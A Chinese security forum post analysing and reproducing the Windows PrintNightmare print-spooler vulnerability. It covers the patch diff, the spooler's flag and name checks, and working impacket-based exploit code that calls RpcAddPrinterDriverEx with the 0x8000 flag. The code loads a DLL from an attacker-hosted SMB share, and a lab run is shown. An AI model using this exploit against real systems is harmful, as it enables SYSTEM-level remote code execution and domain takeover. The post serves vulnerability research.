首页
社区
课程
招聘
[原创] Windows PrintNightmare 漏洞复现分析
发表于: 2022-1-21 11:13 29242

[原创] Windows PrintNightmare 漏洞复现分析

2022-1-21 11:13
29242

Windows Print Spooler是打印后台处理服务,即管理所有本地和网络打印队列及控制所有打印工作。Windows Print Spooler 存在权限提升漏洞,经过身份认证的攻击者可利用此漏洞使 Spooler 服务加载恶意 DLL,从而获取权限提升。利用此漏洞需身份认证,攻击者可通过多种方式获得身份认证信息。在域环境中合适的条件下,未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。

尽管微软将 PrintNightmare 分配给了 CVE-2021-34527,笔者仍然认为它是 CVE-2021-1675 带来的远程代码执行相关的利用。首先进行补丁对比,比较明显的是 RpcAddPrinterDriverEx 函数,在调用 YAddPrinterDriverEx 函数前会进行判断,如果满足一定条件就对 dwFileCopyFlags 进行 &FFFF7FFF 处理,这样操作是为了取消 dwFileCopyFlags 中指定的 0x8000。

补丁前

补丁后

查看文档可知,0x00008000 代表 APD_INSTALL_WARNED_DRIVER,添加打印机驱动程序,即使它在服务器的警告打印机驱动程序列表中。那么下一步就是构造请求使 spooler 程序调用 RpcAddPrinterDriverEx 函数。

首先看一下有没有历史 POC,这样稍作修改就可以使用了。很快就找到了 printerbug.py,它是基于 impacket 写的,并且调用了 RpcOpenPrinter。但是看了下,impacket 中并没有实现 RpcAddPrinterDriverEx,于是参照 impacket.dcerpc.v5.rprn 中的格式,为 RpcAddPrinterDriverEx 添加了类,如下所示:

RpcAddPrinterDriverEx 函数的第二个参数类型 DRIVER_CONTAINER 有些复杂,但参考其他结构的格式很快就能为它写出定义代码:

接下来修改 printerbug.py,主要修改了 PrinterBug 类中的 lookup 函数(这里有一个坑,LPWSTR 这些字符串要以 \x00 结尾,不然会报 rpc_x_bad_stub_data 错误,之前就卡在这里了),如下:

在测试之前还需要在共享的机器上配置允许匿名共享,不然会报错,如下:

在 Windows 机器可以做如下配置:

如果攻击机是 Linux,可以搭建 SMB 服务,然后修改 /etc/samba/smb.conf & sudo service smbd start:

已经有很好的漏洞分析文章了,比如:https://www.freebuf.com/vuls/282023.html
下面不再啰嗦,只是简单记录一下自己想知道的点。

以下为微软文档给出的pName解释:
该参数是一个指向字符串的指针,该字符串指定了该方法所操作的打印服务器的名称。这必须是远程过程调用 (RPC) 绑定到的域名系统 (DNS)NetBIOS互联网协议版本 4 (IPv4)互联网协议版本 6 (IPv6)通用命名约定 (UNC)名称,并且它必须唯一标识网络上的打印服务器。

此参数通过 FindSpoolerByNameIncRef 函数进行检查,如果通过校验,则返回 pLocalIniSpooler。但如果校验失败就不会去执行 SplAddPrinterDriverEx 函数。

在这期间可能会执行 FindSpoolerByNameIncRef->FindSpoolerByName->FindSpooler->CheckMyName->CacheIsNameInNodeList->TNameResolutionCache::IsNameInNodeCache->TResolutionCacheNode::IsNameInNodeCache,直到匹配到一个 pName,如下所示:

以下代码说明 pName 可以为 NULL,在 FindSpoolerByName 函数中如果 pName 不以 "\\" 开头则被判定为 LocalIniSpooler。在 SplAddPrinterDriverEx 函数中还是会调用 MyName->CheckMyName,如果 pName 为 NULL 的话,也会返回 1,这样也可以通过校验。Python 版的 poc 里面 pName 的值就是 NULL。"\\" 也是可以的,可以自己调试一下。

继续看 localspl!SplAddPrinterDriverEx 函数,如果通过了 MyName 校验,会执行下面的代码,比较 dwFileCopyFlags 的第 0xF(15,从0开始索引) 是否被设置,如果设置了该比特位(我们已将其设置为 0x8014),就不会执行 v11 = 1 将 v11 置 1,因而在执行 if ( v11 && !(unsigned int)ValidateObjectAccess(0, 1, 0i64, 0i64, (__int64)pLocalIniSpooler, 0) ) 时,v11 还是 0,从而绕过 ValidateObjectAccess 函数的检查去执行 InternalAddPrinterDriverEx 函数。InternalAddPrinterDriverEx 函数执行完之后,Spooler 服务就会加载指定的 DriverFile 和 ConfigFile 模块,如下所示:

通过前面分析,我们已经有办法可以让 Spooler 服务加载指定 DLL,还是要试一下看它可不可以加载网络上的文件,这样影响将更大一些(本地变远程)。如果将 pConfigFile 直接设置为 UNC 路径(网络路径)会报错。这是因为在 InternalAddPrinterDriverEx 调用 ValidateDriverInfo 函数时会进行以下判断,如果 dwFileCopyFlags 设置了 0x10,pDriverPath 和 pConfigFile 必须是本地文件,否则就会产生 0x57 错误。

以下为调试时信息,可更加直观展示这一流程:

再来看一下文件操作吧,借助 Process Monitor 我们可以看到程序先在 C:\Windows\System32\spool\drivers\x64\3 路径下创建了 Old 和 New 文件夹。

将驱动文件复制到 C:\Windows\System32\spool\drivers\x64\3\New\ 文件夹下,同理 pConfigFile、pDataFile 也被复制进来。

当多次去调用 RpcAddPrinterDriverEx 函数时程序会进行以下操作:

将新的文件复制到 C:\Windows\System32\spool\drivers\x64\3\New\ 目录下

将 C:\Windows\System32\spool\drivers\x64\3 路径下的相关文件移动到 C:\Windows\System32\spool\drivers\x64\3\Old\1 ( 或 2、3……) ,然后将 C:\Windows\System32\spool\drivers\x64\3\New\ 目录下的相关文件移动到 C:\Windows\System32\spool\drivers\x64\3 路径下

然后加载 C:\Windows\System32\spool\drivers\x64\3 路径下的 pDriverPath 和 pConfigFile

这样我们在后面的请求中将 pConfigFile 设置为 C:\Windows\System32\spool\drivers\x64\3\Old\X\asd.dll,如下所示,Spooler 服务成功加载恶意 DLL,并反弹了 SHELL。

参考链接:
https://github.com/numanturle/PrintNightmare
https://www.freebuf.com/vuls/282023.html
https://mp.weixin.qq.com/s/iNOb6cBAfMwCm2AjqbdEvQ
https://mp.weixin.qq.com/s/8j4ylHr8ZDhlrWMAwhVcmQ

 
 
 
 
# 3.1.4.4.8 RpcAddPrinterDriverEx (Opnum 89)
class RpcAddPrinterDriverEx(NDRCALL):
    opnum = 89
    structure = (
       ('pName', STRING_HANDLE),
       ('pDriverContainer', DRIVER_CONTAINER),
       ('dwFileCopyFlags', DWORD),
    )
 
class RpcAddPrinterDriverExResponse(NDRCALL):
    structure = (
       ('ErrorCode', ULONG),
    )
 
def hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags, level=2):
    request = RpcAddPrinterDriverEx()
 
    request['pName'] = pName
    request['pDriverContainer'] = DriverContainer
    request['dwFileCopyFlags'] = flags
    dce.request(request)
 
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
    0  : (RpcEnumPrinters, RpcEnumPrintersResponse),
    1  : (RpcOpenPrinter, RpcOpenPrinterResponse),
    10 : (RpcEnumPrinterDrivers, RpcEnumPrinterDriversResponse),
    29 : (RpcClosePrinter, RpcClosePrinterResponse),
    65 : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
    69 : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
    89 : (RpcAddPrinterDriverEx, RpcAddPrinterDriverExResponse),
}
# 3.1.4.4.8 RpcAddPrinterDriverEx (Opnum 89)
class RpcAddPrinterDriverEx(NDRCALL):
    opnum = 89
    structure = (
       ('pName', STRING_HANDLE),
       ('pDriverContainer', DRIVER_CONTAINER),
       ('dwFileCopyFlags', DWORD),
    )
 
class RpcAddPrinterDriverExResponse(NDRCALL):
    structure = (
       ('ErrorCode', ULONG),
    )
 
def hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags, level=2):
    request = RpcAddPrinterDriverEx()
 
    request['pName'] = pName
    request['pDriverContainer'] = DriverContainer
    request['dwFileCopyFlags'] = flags
    dce.request(request)
 
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
    0  : (RpcEnumPrinters, RpcEnumPrintersResponse),
    1  : (RpcOpenPrinter, RpcOpenPrinterResponse),
    10 : (RpcEnumPrinterDrivers, RpcEnumPrinterDriversResponse),
    29 : (RpcClosePrinter, RpcClosePrinterResponse),
    65 : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
    69 : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
    89 : (RpcAddPrinterDriverEx, RpcAddPrinterDriverExResponse),
}
##################################### MY ADD ######################################
# 2.2.1.5.1 DRIVER_INFO_1
class DRIVER_INFO_1(NDRSTRUCT):
    structure =  (
        ('notUsed',ULONGLONG),
    )
 
class PDRIVER_INFO_1(NDRPOINTER):
    referent = (
        ('Data', DRIVER_INFO_1),
    )
 
# 2.2.1.5.2 DRIVER_INFO_2
class DRIVER_INFO_2(NDRSTRUCT):
    structure =  (
        ('cVersion',DWORD),
        ('pName',LPWSTR),
        ('pEnvironment',LPWSTR),
        ('pDriverPath',LPWSTR),
        ('pDataFile',LPWSTR),
        ('pConfigFile',LPWSTR),
    )
 
class PDRIVER_INFO_2(NDRPOINTER):
    referent = (
        ('Data', DRIVER_INFO_2),
    )
 
# 2.2.1.5.3 RPC_DRIVER_INFO_3
class RPC_DRIVER_INFO_3(NDRSTRUCT):
    structure =  (
        ('cVersion',DWORD),
        ('pName',LPWSTR),
        ('pEnvironment',LPWSTR),
        ('pDriverPath',LPWSTR),
        ('pDataFile',LPWSTR),
        ('pConfigFile',LPWSTR),
        ('pHelpFile',LPWSTR),
        ('pMonitorName',LPWSTR),
        ('pDefaultDataType',LPWSTR),
        ('cchDependentFiles',DWORD),
        ('pDependentFiles',LPWSTR),
    )
 
class PRPC_DRIVER_INFO_3(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_3),
    )
 
# 2.2.1.5.4 RPC_DRIVER_INFO_4
class RPC_DRIVER_INFO_4(NDRSTRUCT):
    structure =  (
        ('cVersion',DWORD),
        ('pName',LPWSTR),
        ('pEnvironment',LPWSTR),
        ('pDriverPath',LPWSTR),
        ('pDataFile',LPWSTR),
        ('pConfigFile',LPWSTR),
        ('pHelpFile',LPWSTR),
        ('pMonitorName',LPWSTR),
        ('pDefaultDataType',LPWSTR),
        ('cchDependentFiles',DWORD),
        ('pDependentFiles',LPWSTR),
        ('cchPreviousNames',DWORD),
        ('pszzPreviousNames',LPWSTR),
    )
 
class PRPC_DRIVER_INFO_4(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_4),
    )
 
# 2.2.1.5.5 RPC_DRIVER_INFO_6
class FILETIME(NDRSTRUCT):
    structure =  (
        ('dwLowDateTime',DWORD),
        ('dwHighDateTime',DWORD),
)
 
class RPC_DRIVER_INFO_6(NDRSTRUCT):
    structure =  (
        ('cVersion',DWORD),
        ('pName',LPWSTR),
        ('pEnvironment',LPWSTR),
        ('pDriverPath',LPWSTR),
        ('pDataFile',LPWSTR),
        ('pConfigFile',LPWSTR),
        ('pHelpFile',LPWSTR),
        ('pMonitorName',LPWSTR),
        ('pDefaultDataType',LPWSTR),
        ('cchDependentFiles',DWORD),
        ('pDependentFiles',LPWSTR),
        ('cchPreviousNames',DWORD),
        ('pszzPreviousNames',LPWSTR),
        ('ftDriverDate',FILETIME),
        ('dwlDriverVersion',ULONGLONG),
        ('pMfgName',LPWSTR),
        ('pOEMUrl',LPWSTR),
        ('pHardwareID',LPWSTR),
        ('pProvider',LPWSTR),
    )
 
class PRPC_DRIVER_INFO_6(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_6),
    )
 
# 2.2.1.5.6 RPC_DRIVER_INFO_8
class RPC_DRIVER_INFO_8(NDRSTRUCT):
    structure =  (
        ('cVersion',DWORD),
        ('pName',LPWSTR),
        ('pEnvironment',LPWSTR),
        ('pDriverPath',LPWSTR),
        ('pDataFile',LPWSTR),
        ('pConfigFile',LPWSTR),
        ('pHelpFile',LPWSTR),
        ('pMonitorName',LPWSTR),
        ('pDefaultDataType',LPWSTR),
        ('cchDependentFiles',DWORD),
        ('pDependentFiles',LPWSTR),
        ('cchPreviousNames',DWORD),
        ('pszzPreviousNames',LPWSTR),
        ('ftDriverDate',FILETIME),
        ('dwlDriverVersion',ULONGLONG),
        ('pMfgName',LPWSTR),
        ('pOEMUrl',LPWSTR),
        ('pHardwareID',LPWSTR),
        ('pProvider',LPWSTR),
        ('pPrintProcessor',LPWSTR),
        ('pVendorSetup',LPWSTR),
        ('cchColorProfiles',DWORD),
        ('pszzColorProfiles',LPWSTR),
        ('pInfPath',LPWSTR),
        ('dwPrinterDriverAttributes',DWORD),
        ('cchCoreDependencies',DWORD),
        ('ftMinInboxDriverVerDate',FILETIME),
        ('dwlMinInboxDriverVerVersion',ULONGLONG),
    )
 
class PRPC_DRIVER_INFO_8(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_8),
    )
 
# 2.2.1.2.3 DRIVER_CONTAINER
class Driver_Info_UNION(NDRUNION):
    commonHdr = (
        ('tag', ULONG),
    )
    union = {
        1 : ('pNotUsed', PDRIVER_INFO_1),
        2 : ('Level2', PDRIVER_INFO_2),
        3 : ('Level3', PRPC_DRIVER_INFO_3),
        4 : ('Level4', PRPC_DRIVER_INFO_4),
        5 : ('Level6', PRPC_DRIVER_INFO_6),
        6 : ('Level8', PRPC_DRIVER_INFO_8),
    }
 
class DRIVER_CONTAINER(NDRSTRUCT):
    structure =  (
        ('Level',DWORD),
        ('DriverInfo',Driver_Info_UNION),
    )
##################################### MY ADD ######################################
# 2.2.1.5.1 DRIVER_INFO_1
class DRIVER_INFO_1(NDRSTRUCT):
    structure =  (
        ('notUsed',ULONGLONG),
    )
 
class PDRIVER_INFO_1(NDRPOINTER):
    referent = (
        ('Data', DRIVER_INFO_1),
    )
 
# 2.2.1.5.2 DRIVER_INFO_2
class DRIVER_INFO_2(NDRSTRUCT):
    structure =  (
        ('cVersion',DWORD),
        ('pName',LPWSTR),
        ('pEnvironment',LPWSTR),
        ('pDriverPath',LPWSTR),
        ('pDataFile',LPWSTR),
        ('pConfigFile',LPWSTR),
    )
 
class PDRIVER_INFO_2(NDRPOINTER):
    referent = (
        ('Data', DRIVER_INFO_2),
    )
 
# 2.2.1.5.3 RPC_DRIVER_INFO_3
class RPC_DRIVER_INFO_3(NDRSTRUCT):
    structure =  (
        ('cVersion',DWORD),
        ('pName',LPWSTR),
        ('pEnvironment',LPWSTR),
        ('pDriverPath',LPWSTR),
        ('pDataFile',LPWSTR),
        ('pConfigFile',LPWSTR),
        ('pHelpFile',LPWSTR),
        ('pMonitorName',LPWSTR),
        ('pDefaultDataType',LPWSTR),
        ('cchDependentFiles',DWORD),
        ('pDependentFiles',LPWSTR),
    )
 
class PRPC_DRIVER_INFO_3(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_3),
    )
 
# 2.2.1.5.4 RPC_DRIVER_INFO_4
class RPC_DRIVER_INFO_4(NDRSTRUCT):
    structure =  (
        ('cVersion',DWORD),
        ('pName',LPWSTR),
        ('pEnvironment',LPWSTR),
        ('pDriverPath',LPWSTR),
        ('pDataFile',LPWSTR),
        ('pConfigFile',LPWSTR),
        ('pHelpFile',LPWSTR),
        ('pMonitorName',LPWSTR),
        ('pDefaultDataType',LPWSTR),
        ('cchDependentFiles',DWORD),
        ('pDependentFiles',LPWSTR),
        ('cchPreviousNames',DWORD),
        ('pszzPreviousNames',LPWSTR),
    )
 
class PRPC_DRIVER_INFO_4(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_4),
    )
 
# 2.2.1.5.5 RPC_DRIVER_INFO_6
class FILETIME(NDRSTRUCT):
    structure =  (
        ('dwLowDateTime',DWORD),
        ('dwHighDateTime',DWORD),
)
 
class RPC_DRIVER_INFO_6(NDRSTRUCT):
    structure =  (
        ('cVersion',DWORD),
        ('pName',LPWSTR),
        ('pEnvironment',LPWSTR),
        ('pDriverPath',LPWSTR),
        ('pDataFile',LPWSTR),
        ('pConfigFile',LPWSTR),
        ('pHelpFile',LPWSTR),
        ('pMonitorName',LPWSTR),
        ('pDefaultDataType',LPWSTR),
        ('cchDependentFiles',DWORD),
        ('pDependentFiles',LPWSTR),
        ('cchPreviousNames',DWORD),
        ('pszzPreviousNames',LPWSTR),
        ('ftDriverDate',FILETIME),
        ('dwlDriverVersion',ULONGLONG),
        ('pMfgName',LPWSTR),
        ('pOEMUrl',LPWSTR),
        ('pHardwareID',LPWSTR),
        ('pProvider',LPWSTR),
    )
 
class PRPC_DRIVER_INFO_6(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_6),
    )
 
# 2.2.1.5.6 RPC_DRIVER_INFO_8
class RPC_DRIVER_INFO_8(NDRSTRUCT):
    structure =  (
        ('cVersion',DWORD),
        ('pName',LPWSTR),
        ('pEnvironment',LPWSTR),
        ('pDriverPath',LPWSTR),
        ('pDataFile',LPWSTR),
        ('pConfigFile',LPWSTR),
        ('pHelpFile',LPWSTR),
        ('pMonitorName',LPWSTR),
        ('pDefaultDataType',LPWSTR),
        ('cchDependentFiles',DWORD),
        ('pDependentFiles',LPWSTR),
        ('cchPreviousNames',DWORD),
        ('pszzPreviousNames',LPWSTR),
        ('ftDriverDate',FILETIME),
        ('dwlDriverVersion',ULONGLONG),
        ('pMfgName',LPWSTR),
        ('pOEMUrl',LPWSTR),
        ('pHardwareID',LPWSTR),
        ('pProvider',LPWSTR),
        ('pPrintProcessor',LPWSTR),
        ('pVendorSetup',LPWSTR),
        ('cchColorProfiles',DWORD),
        ('pszzColorProfiles',LPWSTR),
        ('pInfPath',LPWSTR),
        ('dwPrinterDriverAttributes',DWORD),
        ('cchCoreDependencies',DWORD),
        ('ftMinInboxDriverVerDate',FILETIME),
        ('dwlMinInboxDriverVerVersion',ULONGLONG),
    )
 
class PRPC_DRIVER_INFO_8(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_8),
    )
 
# 2.2.1.2.3 DRIVER_CONTAINER
class Driver_Info_UNION(NDRUNION):
    commonHdr = (
        ('tag', ULONG),
    )
    union = {
        1 : ('pNotUsed', PDRIVER_INFO_1),
        2 : ('Level2', PDRIVER_INFO_2),
        3 : ('Level3', PRPC_DRIVER_INFO_3),
        4 : ('Level4', PRPC_DRIVER_INFO_4),
        5 : ('Level6', PRPC_DRIVER_INFO_6),
        6 : ('Level8', PRPC_DRIVER_INFO_8),
    }
 
class DRIVER_CONTAINER(NDRSTRUCT):
    structure =  (
        ('Level',DWORD),
        ('DriverInfo',Driver_Info_UNION),
    )
#def lookup(self, rpctransport, host):
        level = 2
        Driver_Info_Union = rprn.Driver_Info_UNION()
        Driver_Info_Union['tag'] = level
        DRIVER_INFO = Driver_Info_Union["Level"+str(level)]
 
        DRIVER_INFO['cVersion'] = 3
        DRIVER_INFO['pName'] = "Test printer\x00"
        DRIVER_INFO['pEnvironment'] = "Windows x64\x00"
        DRIVER_INFO['pDriverPath'] = pDriverPath
        DRIVER_INFO['pDataFile'] = "\\\\{}\\smb\\asd.dll\x00".format(self.__attackerhost)
        DRIVER_INFO['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"
 
        DriverContainer = rprn.DRIVER_CONTAINER()
        DriverContainer['Level'] = level
        DriverContainer['DriverInfo'] = Driver_Info_Union
 
        #resp = rprn.hRpcEnumPrinters(dce, rprn.PRINTER_ENUM_NAME)
        print("[*] Attempting to call RpcAddPrinterDriverEx")
        pName = NULL
        flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
        resp = rprn.hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags)
#def lookup(self, rpctransport, host):
        level = 2
        Driver_Info_Union = rprn.Driver_Info_UNION()
        Driver_Info_Union['tag'] = level
        DRIVER_INFO = Driver_Info_Union["Level"+str(level)]
 
        DRIVER_INFO['cVersion'] = 3
        DRIVER_INFO['pName'] = "Test printer\x00"
        DRIVER_INFO['pEnvironment'] = "Windows x64\x00"
        DRIVER_INFO['pDriverPath'] = pDriverPath
        DRIVER_INFO['pDataFile'] = "\\\\{}\\smb\\asd.dll\x00".format(self.__attackerhost)
        DRIVER_INFO['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"
 
        DriverContainer = rprn.DRIVER_CONTAINER()
        DriverContainer['Level'] = level
        DriverContainer['DriverInfo'] = Driver_Info_Union
 
        #resp = rprn.hRpcEnumPrinters(dce, rprn.PRINTER_ENUM_NAME)
        print("[*] Attempting to call RpcAddPrinterDriverEx")
        pName = NULL
        flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
        resp = rprn.hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags)
┌──(strawberry㉿kalilili)-[~]
└─$ python testprinter.py strawberry@192.168.140.222 192.168.140.144
[*] Impacket v0.9.24.dev1+20210618.54810.11f43043 - Copyright 2021 SecureAuth Corporation
 
Password:
[*] Attempting to trigger authentication via rprn RPC at 192.168.140.222
[*] Bind OK
[*] Attempting to call RpcAddPrinterDriverEx ......
[-] Lookup Error: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
┌──(strawberry㉿kalilili)-[~]
└─$ python testprinter.py strawberry@192.168.140.222 192.168.140.144
[*] Impacket v0.9.24.dev1+20210618.54810.11f43043 - Copyright 2021 SecureAuth Corporation

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 4
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//